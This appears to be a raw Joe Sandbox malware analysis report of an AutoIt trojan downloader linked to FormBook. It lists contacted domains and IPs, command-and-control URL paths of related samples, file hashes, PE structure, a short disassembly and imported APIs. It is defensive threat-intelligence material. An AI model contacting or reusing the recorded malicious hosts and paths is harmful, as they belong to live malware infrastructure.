                          https://www.itsjojosiwas.com/wp-includes/js/dist/primitives.min.js?ver=6984e6eb5d6157c4fe44makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
(Chart omitted; its legend bucketed entries by share of contacted IPs: below 25%, 25% to 50%, 50% to 75%, above 75%.)
IP | Domain | Country | ASN | ASN name | Malicious
23.105.215.248 | nbq.ssywan.com | Canada | 25820 | IT7NETCA | false
43.157.128.107 | www.onlandtoy.com | Japan | 4249 | LILLY-ASUS | false
216.194.173.237 | mysticriverpath.com | United States | 22611 | IMH-WESTUS | false
203.161.41.205 | www.quiluxx.top | Malaysia | 45899 | VNPT-AS-VNVNPTCorpVN | false
104.21.89.46 | www.rtpdewata4d-16.xyz | United States | 13335 | CLOUDFLARENETUS | true
3.33.130.190 | kundalisathi.com | United States | 8987 | AMAZONEXPANSIONGB | false
212.227.172.254 | www.focusonsocials.com | Germany | 8560 | ONEANDONE-ASBrauerstrasse48DE | false
64.46.102.70 | kera333.org | United States | 26163 | DATAGRAMUS | false
103.176.91.154 | www.bb58cc.com | unknown | 7575 | AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | false
3.33.244.179 | www.bestandpure.com | United States | 8987 | AMAZONEXPANSIONGB | false
172.67.196.1 | www.itsjojosiwas.com | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1474004
Start date and time: 2024-07-16 07:20:08 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 26s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/5@16/11
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 91%
• Number of executed functions: 55
• Number of non-executed functions: 271
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information
• Report size exceeded the maximum capacity and may be missing disassembly code
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
01:22:07 | API Interceptor | 12243151x Sleep call for process: makecab.exe modified
Match (IP) | Associated sample name / URL | Detection | Threat name | Context
23.105.215.248 | HSBC Bank_Approvel Letter.exe | malicious | FormBook | www.3333711m14.shop/td6z/
43.157.128.107 | Your file name without extension goes here.exe | malicious | FormBook | www.onlandtoy.com/y145/
216.194.173.237 | SecuriteInfo.com.Trojan.AutoIt.1410.27475.23700.exe | malicious | FormBook | www.mysticriverpath.com/6vu8/
216.194.173.237 | jlsvOH1c8bSRKqM.exe | malicious | FormBook | www.mysticriverpath.com/0guv/
203.161.41.205 | New PO.exe | malicious | FormBook, PureLog Stealer | www.hellenstore.top/sfd2/
203.161.41.205 | Your file name without extension goes here.exe | malicious | FormBook | www.tfcgreen.top/mcba/
203.161.41.205 | adobe_scanner12.exe | malicious | FormBook | www.shabygreen.top/4n8t/
203.161.41.205 | 7RsDGpyOQk.exe | malicious | FormBook | www.shabygreen.top/4n8t/
203.161.41.205 | AWB 112-17259653.exe | malicious | FormBook | www.devtech.life/rewk/
104.21.89.46 | Confirmation For-Certara.pdf | malicious | HTMLPhisher | (none)
3.33.130.190 | GSTP - K3E0035.exe | malicious | FormBook | www.haberyazilimlari.xyz/gp7t/
3.33.130.190 | vstdlib_s64.dll.dll | malicious | Quasar | freegeoip.net/xml/
3.33.130.190 | vstdlib_s64.dll.dll | malicious | Quasar | freegeoip.net/xml/
3.33.130.190 | New PO.exe | malicious | FormBook, PureLog Stealer | www.mscuration.com/txr6/
3.33.130.190 | ORDEN_240715189833.IMG | malicious | DarkTortilla, FormBook | www.shapenbuy.com/5xz5/
3.33.130.190 | BL.exe | malicious | FormBook | www.abc8web.com/sm5e/
3.33.130.190 | OrderPI.exe | malicious | FormBook | www.lextcommunities.com/qt3s/
3.33.130.190 | docs_pdf.exe | malicious | FormBook | www.789bet1okvip.solutions/aoam/?D0Pts04=Eo7hyHn30cp3PMowPDjUS1eso/Zba7hHHMc1+Dk3yrF+CAsKksIOHOuhtM05CC/e3HjWlDqziYa3lDzCuMJvVQxsVStEDyJQgF4EVzhIE64C3aguyc8vXyTVrLHS4c+iCk5yFwg=&Q8s=tdcd5h7ptjmdxx
3.33.130.190 | payment advice.exe | malicious | FormBook | www.abc8web.com/sm5e/
3.33.130.190 | vNrcPvMYLZmn2cc.exe | malicious | FormBook | www.zerolength.xyz/mc10/?yrCDSlw=+hw+aGSrqNJPXAKTI+d1f9+ihmayTPYKE17mK9H9odLh7YQ+aA2Ta0l7fr2FH5vYxut0&Jlt=Y4Ctjz3PDNY8yDR
Match (domain) | Associated sample name / URL | Detection | Threat name | Context
www.bb58cc.com | DHL Receipt_AWB#20240079104.exe | malicious | FormBook | 43.240.144.35
www.bb58cc.com | FedEx Receipt_AWB# 102003550412.exe | malicious | FormBook | 43.240.144.35
www.onlandtoy.com | SecuriteInfo.com.Trojan.AutoIt.1410.27475.23700.exe | malicious | FormBook | 43.157.128.107
www.onlandtoy.com | Your file name without extension goes here.exe | malicious | FormBook | 43.157.128.107
www.itsjojosiwas.com | New PO.exe | malicious | FormBook, PureLog Stealer | 172.67.196.1
www.focusonsocials.com | SecuriteInfo.com.Trojan.AutoIt.1410.27475.23700.exe | malicious | FormBook | 212.227.172.254
nbq.ssywan.com | HSBC Bank_Approvel Letter.exe | malicious | FormBook | 23.105.215.248
Match (ASN) | Associated sample name / URL | Detection | Threat name | Context
LILLY-ASUS | http://dream-orbit.com/dreamorbit-selected-as-a-2012-red-herring-top-100-asia/%20dream-orbit.com | malicious | Unknown | 43.202.168.202
LILLY-ASUS | SzEvaEcbe3.elf | malicious | Unknown | 42.209.62.168
LILLY-ASUS | botx.arm6.elf | malicious | Mirai | 43.118.22.94
LILLY-ASUS | botx.x86.elf | malicious | Mirai | 42.136.249.226
LILLY-ASUS | 185.208.158.215-x86-2024-07-14T08_54_06.elf | malicious | Unknown | 40.26.85.166
LILLY-ASUS | 185.208.158.215-mips-2024-07-14T08_54_05.elf | malicious | Unknown | 43.132.240.94
LILLY-ASUS | mlk3kK6uLZ.exe | malicious | Amadey, Mars Stealer, PureLog Stealer, Quasar, RedLine, Stealc, Vidar | 43.153.49.49
LILLY-ASUS | jew.arm.elf | malicious | Unknown | 40.53.82.30
LILLY-ASUS | jew.arm7.elf | malicious | Mirai | 42.139.82.6
LILLY-ASUS | jew.mpsl.elf | malicious | Mirai | 40.210.7.201
IMH-WESTUS | https://bmryw2w4c4m3dw.inwise.net/Page_7-15-2024_1 | malicious | Phisher | 74.124.202.185
IMH-WESTUS | https://eu-central.storage.cloudconvert.com/tasks/7667d2fd-6c13-460b-8f55-f179433b3df4/bfcce31c888656d9c91c1b50d320f0648923cfac65d48f69d06cc63b929442e7.zip?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=cloudconvert-production%2F20240712%2Ffra%2Fs3%2Faws4_request&X-Amz-Date=20240712T095048Z&X-Amz-Expires=86400&X-Amz-Signature=24a9e07e4d7f7a1e041068ee72845360480440bd0d03e47d7a22ccf3f04b294d&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3D%22bfcce31c888656d9c91c1b50d320f0648923cfac65d48f69d06cc63b929442e7.zip%22&response-content-type=application%2Fzip&x-id=GetObject | malicious | AgentTesla, PureLog Stealer | 216.194.168.39
IMH-WESTUS | SecuriteInfo.com.Trojan.AutoIt.1410.27475.23700.exe | malicious | FormBook | 216.194.173.237
IMH-WESTUS | jlsvOH1c8bSRKqM.exe | malicious | FormBook | 216.194.173.237
IMH-WESTUS | DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exe | malicious | AgentTesla | 216.194.161.167
IMH-WESTUS | DHL AWB COMMERCAIL INVOICE AND TRACKNG DETAILS.exe | malicious | AgentTesla | 216.194.161.167
IMH-WESTUS | DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exe | malicious | AgentTesla | 216.194.161.167
IMH-WESTUS | DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exe | malicious | AgentTesla | 216.194.161.167
IMH-WESTUS | https://fhdqc8.fi59.fdske.com/ec/gAAAAABmfGZyxTh2_K7pHFLC0GqgMqzWDGy5rzOEXF5rWzzKyIh9SQQExFxMQ4awca19AuE2VvhAc9xMu62rgsB6VoJB4N9_fBGtHi3bqIWidSZzaqe6vAuqfJ2HLS_07LjIIFB3TPyWrVCoDPci0vJbEOdFpQbvgMhQ2bb5wwjc0QCyYMs2huEbMV0bF6VlM0VyKvcYrSXwroV9aI7YNrZVFratXAJOXua81IBgQ_lBlo0qGGQdFoqJacHMDkjGxuYp664Cy1FCW8W0d91K8bj980Cvliw9OLQxlehUsXbXZowsYCsVKv0Fne-F6gv0Krh2AVe-ilbzwDq1zcnJIobjeErIHapsGWTJtbLVauq4zhAsYdUWRkCB9SiulS3R7ML3XCRzZ_QN | malicious | HTMLPhisher | 209.182.194.173
IMH-WESTUS | https://fhdqc8.fi59.fdske.com/ec/gAAAAABmfGZyjC4MVZ8WF44ySzBi6efN3zaqod3SxqQ1kDtzYoyQOsWWD19NsGcVNDBcFjl9mUT7fbfISshhTM2Hik02CHjq-9Q67vAot3BfkCz1fsPEPNCf7G7MVRriPpFBDyLvG5wWqHsR-cwOURIaxnerOQ99C00IkC5xo8SyVqmsRm4_h22BEVkgpwhIxN5ZLSZjkxsDiVXWEiomSy9VfeZMSpAZBIiVY5QOn61X75pVs8oUeoKLdPrvk2c30UYd3VO5mnFHavb6nEffGuo1D5oKxYWc0Cn_-p6tPW-P_jOehq5HKz3wTiXh0DEAmqouDGoQMnrEZrqh3uNO8i3DH8OUtiyY0qJrP4tokSeZMhLFcgcGL1rQtDYermPtRGb82rC_qMPluzB5vb8_joMO7PI6RQTXMQ== | malicious | HTMLPhisher | 209.182.194.173
VNPT-AS-VNVNPTCorpVN | statment-document.scr.exe | malicious | FormBook, PureLog Stealer | 203.161.62.199
VNPT-AS-VNVNPTCorpVN | 5Jan3SztHt.elf | malicious | Unknown | 14.236.4.16
VNPT-AS-VNVNPTCorpVN | z46SOLICITA____.exe | malicious | FormBook | 203.161.49.220
VNPT-AS-VNVNPTCorpVN | rDU-Payment48R_.exe | malicious | PureLog Stealer, zgRAT | 203.161.42.156
VNPT-AS-VNVNPTCorpVN | New PO.exe | malicious | FormBook, PureLog Stealer | 203.161.41.205
VNPT-AS-VNVNPTCorpVN | botx.arm6.elf | malicious | Mirai | 113.183.33.180
VNPT-AS-VNVNPTCorpVN | botx.x86.elf | malicious | Mirai | 203.210.177.226
VNPT-AS-VNVNPTCorpVN | DHL_AWB#6078538091.exe | malicious | FormBook | 203.161.55.124
VNPT-AS-VNVNPTCorpVN | 185.208.158.215-x86-2024-07-14T08_54_06.elf | malicious | Unknown | 14.186.26.175
VNPT-AS-VNVNPTCorpVN | mlk3kK6uLZ.exe | malicious | Amadey, Mars Stealer, PureLog Stealer, Quasar, RedLine, Stealc, Vidar | 113.161.210.60
IT7NETCA | 185.208.158.215-mips-2024-07-14T08_54_05.elf | malicious | Unknown | 95.169.14.81
IT7NETCA | FcMd5XxxZ0.elf | malicious | Mirai | 107.182.180.140
IT7NETCA | Document.exe | malicious | FormBook | 95.169.27.235
IT7NETCA | SecuriteInfo.com.Exploit.CVE-2017-11882.123.8256.26893.rtf | malicious | FormBook | 95.169.27.235
IT7NETCA | Your file name without extension goes here.exe | malicious | FormBook | 95.169.27.235
IT7NETCA | HSBC Bank_Approvel Letter.exe | malicious | FormBook | 23.105.215.248
IT7NETCA | D2XjA30YmD.elf | malicious | Mirai | 144.34.183.93
IT7NETCA | http://telegram-chinese.vn/ | malicious | Unknown | 178.157.60.45
IT7NETCA | 06V2RO89xu.elf | malicious | Mirai | 69.194.9.68
IT7NETCA | saq4WWKA5B.elf | malicious | Mirai | 45.62.98.20
                            No context
                            No context
                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):272384
                            Entropy (8bit):7.994277033599217
                            Encrypted:true
                            SSDEEP:6144:RPzzfbYJ1oqkVcGXqCvcfWNNZt7YZFYx0P5hRK/0SjzU1Zg:NfY2cUvcfWN7t8xLkia
                            MD5:289BD1C11144081228E5152CAD6E9547
                            SHA1:10D1D938B69247EFC94294BD2BE860422D47E16D
                            SHA-256:E9AAA352BCDBE7B8805AC5F438409E241C5E7EC9AB34E479917880E4D06842EE
                            SHA-512:082B5D3C7A0F42BC18481E2C66EE97FBEFF28C3F7B3542F40E679FAFB5ED19CA94BE0D4E9F3DE242794566C76AF2B61B5900AA0DBF67C1EE89DBEC34CE38F601
                            Malicious:false
                            Reputation:low
                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):9808
                            Entropy (8bit):7.61278628207434
                            Encrypted:false
                            SSDEEP:192:ZfyK5mQmlyEAZBZyZXeGPmoRO3oQUStrNZLHiJ:Ry4fIyVBYzFReHUStxZLq
                            MD5:61C33A61BFDE9FDB3268E17BB3D328A5
                            SHA1:6A8C4DF089C8A4B39670091A3BDF0A240409ECDC
                            SHA-256:79C69BB233F9A610DB59959B3DA5689A6226A975F90757A5206806686928BF99
                            SHA-512:5ED574DCF9468905589CE062EF50B900FDB0FB58D2061E1F155AC4A3446339BCCD0B7DDCBD46ECFD2106D9F441E35D2AAE9EC58E35140F707705C7BD79D1C5FD
                            Malicious:false
                            Reputation:low
                            Process:C:\Windows\SysWOW64\makecab.exe
                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                            Category:dropped
                            Size (bytes):114688
                            Entropy (8bit):0.9746603542602881
                            Encrypted:false
                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                            Malicious:false
                            Reputation:high, very likely benign file
                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):272384
                            Entropy (8bit):7.994277033599217
                            Encrypted:true
                            SSDEEP:6144:RPzzfbYJ1oqkVcGXqCvcfWNNZt7YZFYx0P5hRK/0SjzU1Zg:NfY2cUvcfWN7t8xLkia
                            MD5:289BD1C11144081228E5152CAD6E9547
                            SHA1:10D1D938B69247EFC94294BD2BE860422D47E16D
                            SHA-256:E9AAA352BCDBE7B8805AC5F438409E241C5E7EC9AB34E479917880E4D06842EE
                            SHA-512:082B5D3C7A0F42BC18481E2C66EE97FBEFF28C3F7B3542F40E679FAFB5ED19CA94BE0D4E9F3DE242794566C76AF2B61B5900AA0DBF67C1EE89DBEC34CE38F601
                            Malicious:false
                            Reputation:low
                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe
                            File Type:ASCII text, with very long lines (28674), with no line terminators
                            Category:dropped
                            Size (bytes):28674
                            Entropy (8bit):3.589172367446598
                            Encrypted:false
                            SSDEEP:384:rYzxrp0kEaI5EkuVLXDXurxdmTf+z69p509:rYz7gaI5EkuZDXuOrT509
                            MD5:25AFC2CF4BCC17DD5EFCC970A1E3A0E0
                            SHA1:A5434B5D83EB462BD4BA3789F4513C7EBC227C09
                            SHA-256:D5BC68079E39D7C488BFEB634F340D5E78926B979391945F8202F89075C6E8D5
                            SHA-512:7681CAC3951291E299E565971648D666B2684B8EF999818DA0C5ED4837D4C3FB7E498E4009BFE804823E67E4D2BD59B29EF3F8A898489C406C6586338A55AA8D
                            Malicious:false
                            Reputation:low
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.133116241960096
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe
                            File size:1'179'136 bytes
                            MD5:13c0e83573fffeb4e951929815daf4e1
                            SHA1:9e1302aaabccb29247948ded46c92fca6d1fa2a0
                            SHA256:d37fe4f855049ecab456f1badc8f52afecf4d6ee3d7d43de84b7e0940dbb7399
                            SHA512:827960af2699a6d39f58d5a47f7070a30d5acbc9db39b680eeac75cdca5fd05746e1d110759cb4bda28d7064f9709d01ab9708febc45be310b987df61de40ab0
                            SSDEEP:24576:zAHnh+eWsN3skA4RV1Hom2KXMmHaf/m+B3rMrKro5:+h+ZkldoPK8YafpiKy
                            TLSH:A445BE0273D2C036FFABA2739B6AF60156BD79254123852F13981DB9BD701B1273E663
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
                            Icon Hash:aaf3e3e3938382a0
                            Entrypoint:0x42800a
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x6695B0E2 [Mon Jul 15 23:29:38 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:afcdf79be1557326c854b6e20cb900a7
                            Instruction
                            call 00007FE790C1718Dh
                            jmp 00007FE790C09F44h
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            push edi
                            push esi
                            mov esi, dword ptr [esp+10h]
                            mov ecx, dword ptr [esp+14h]
                            mov edi, dword ptr [esp+0Ch]
                            mov eax, ecx
                            mov edx, ecx
                            add eax, esi
                            cmp edi, esi
                            jbe 00007FE790C0A0CAh
                            cmp edi, eax
                            jc 00007FE790C0A42Eh
                            bt dword ptr [004C41FCh], 01h
                            jnc 00007FE790C0A0C9h
                            rep movsb
                            jmp 00007FE790C0A3DCh
                            cmp ecx, 00000080h
                            jc 00007FE790C0A294h
                            mov eax, edi
                            xor eax, esi
                            test eax, 0000000Fh
                            jne 00007FE790C0A0D0h
                            bt dword ptr [004BF324h], 01h
                            jc 00007FE790C0A5A0h
                            bt dword ptr [004C41FCh], 00000000h
                            jnc 00007FE790C0A26Dh
                            test edi, 00000003h
                            jne 00007FE790C0A27Eh
                            test esi, 00000003h
                            jne 00007FE790C0A25Dh
                            bt edi, 02h
                            jnc 00007FE790C0A0CFh
                            mov eax, dword ptr [esi]
                            sub ecx, 04h
                            lea esi, dword ptr [esi+04h]
                            mov dword ptr [edi], eax
                            lea edi, dword ptr [edi+04h]
                            bt edi, 03h
                            jnc 00007FE790C0A0D3h
                            movq xmm1, qword ptr [esi]
                            sub ecx, 08h
                            lea esi, dword ptr [esi+08h]
                            movq qword ptr [edi], xmm1
                            lea edi, dword ptr [edi+08h]
                            test esi, 00000007h
                            je 00007FE790C0A125h
                            bt esi, 03h
                            Programming Language:
                            • [ASM] VS2013 build 21005
                            • [ C ] VS2013 build 21005
                            • [C++] VS2013 build 21005
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [ASM] VS2013 UPD5 build 40629
                            • [RES] VS2013 build 21005
                            • [LNK] VS2013 UPD5 build 40629
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xbc0cc | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc8000 | 0x5577c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x11e000 | 0x7134 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4b50 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dfdd | 0x8e000 | 310e36668512d53489c005622bb1b4a9 | False | 0.5735602580325704 | data | 6.675248351711057 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2fd8e | 0x2fe00 | 748cf1ab2605ce1fd72d53d912abb68f | False | 0.32828818537859006 | data | 5.763244005758284 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbf000 | 0x8f74 | 0x5200 | aae9601d920f07080bdfadf43dfeff12 | False | 0.1017530487804878 | data | 1.1963819235530628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc8000 | 0x5577c | 0x55800 | 380ae110705106403ac1817e40c818b3 | False | 0.9255042717470761 | data | 7.890293250077855 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x11e000 | 0x7134 | 0x7200 | f04128ad0f87f42830e4a6cdbc38c719 | False | 0.7617530153508771 | data | 6.783955557128661 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc84a0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc85c8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc88b0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc89d8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc9880 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xca128 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xca690 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xccc38 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xcdce0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_STRING | 0xce148 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xce6dc | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xced68 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xcf1f8 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xcf7f4 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcfe50 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xd02b8 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xd0410 | 0x4ce14 | data | | | 1.0003366147983488
RT_GROUP_ICON | 0x11d224 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x11d29c | 0x14 | data | English | Great Britain | 1.15
RT_VERSION | 0x11d2b0 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x11d38c | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, 